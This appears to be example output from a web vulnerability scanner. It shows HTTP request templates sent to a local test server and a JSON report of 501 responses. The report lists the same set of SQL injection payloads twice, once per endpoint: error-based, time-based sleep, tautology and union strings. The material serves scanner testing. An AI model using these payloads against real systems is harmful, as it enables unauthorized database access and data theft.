Requesting with these templates (note that SimpleHTTPServer answers every non-GET request with a 501 status code, whatever the request body contains):
GET /derp HTTP/1.1
Accept: application/json
POST /test HTTP/1.1
Content-Type: application/json
Accept: application/json
{"test": 2}
POST /test HTTP/1.1
Content-Type: application/json
Accept: application/json
{"derp": 2}
PUT /test2 HTTP/1.1
Content-Type: application/json
Accept: application/json
{"derp": 2}
This yields the following output:
{
"errors": [],
"failures": {
"localhost:9000/test": {
"500_errors": {
"description": "This request returns an error with status code 501, which might indicate some server-side fault that could lead to further vulnerabilities",
"payloads": [
{
"confidence": "High",
"param": {
"location": "data",
"method": "POST",
"type": "application/json",
"variables": [
"test",
"derp"
]
},
"strings": [
"AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)",
"AND EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x'))",
"AND UPDATEXML(1,CONCAT('.','x',(SELECT (ELT(1=1,1))),'x'),2)",
"AND ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)",
"AND 1=CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC)",
"PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT('','x',(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END)),'x')),1)",
"(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)",
"(EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x')))",
"(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))",
",(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)",
",ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)",
",(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))",
"AND (SELECT * FROM (SELECT(SLEEP(10)))x)",
"AND SLEEP(10)",
"RLIKE (SELECT * FROM (SELECT(SLEEP(10)))x)",
"AND ELT(1=1,SLEEP(10))",
"AND 1=(SELECT 1 FROM PG_SLEEP(10))",
"(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))",
"(SELECT * FROM (SELECT(SLEEP(10)))x)",
"(SELECT 1 FROM PG_SLEEP(10))",
",(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))",
",(SELECT (CASE WHEN (1=1) THEN (SELECT 1 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))",
"a'b\"c'd\"",
"' or 'a'='a",
"\" or \"a\"=\"a",
"') or ('a'='a",
"'/**/OR/**/1/**/=/**/1",
"' or 1=1 --",
"' union (select @@version) --",
"; OR '1'='1'"
]
}
],
"severity": "Low"
}
},
"localhost:9000/test2": {
"500_errors": {
"description": "This request returns an error with status code 501, which might indicate some server-side fault that could lead to further vulnerabilities",
"payloads": [
{
"confidence": "High",
"param": {
"location": "data",
"method": "PUT",
"type": "application/json",
"variables": [
"derp"
]
},
"strings": [
"AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)",
"AND EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x'))",
"AND UPDATEXML(1,CONCAT('.','x',(SELECT (ELT(1=1,1))),'x'),2)",
"AND ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)",
"AND 1=CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC)",
"PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT('','x',(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END)),'x')),1)",
"(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)",
"(EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x')))",
"(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))",
",(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)",
",ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)",
",(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))",
"AND (SELECT * FROM (SELECT(SLEEP(10)))x)",
"AND SLEEP(10)",
"RLIKE (SELECT * FROM (SELECT(SLEEP(10)))x)",
"AND ELT(1=1,SLEEP(10))",
"AND 1=(SELECT 1 FROM PG_SLEEP(10))",
"(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))",
"(SELECT * FROM (SELECT(SLEEP(10)))x)",
"(SELECT 1 FROM PG_SLEEP(10))",
",(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))",
",(SELECT (CASE WHEN (1=1) THEN (SELECT 1 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))",
"a'b\"c'd\"",
"' or 'a'='a",
"\" or \"a\"=\"a",
"') or ('a'='a",
"'/**/OR/**/1/**/=/**/1",
"' or 1=1 --",
"' union (select @@version) --",
"; OR '1'='1'"
]
}
],
"severity": "Low"
}
}
},
"stats": {
"High": 0,
"Low": 2,
"Medium": 0
}
}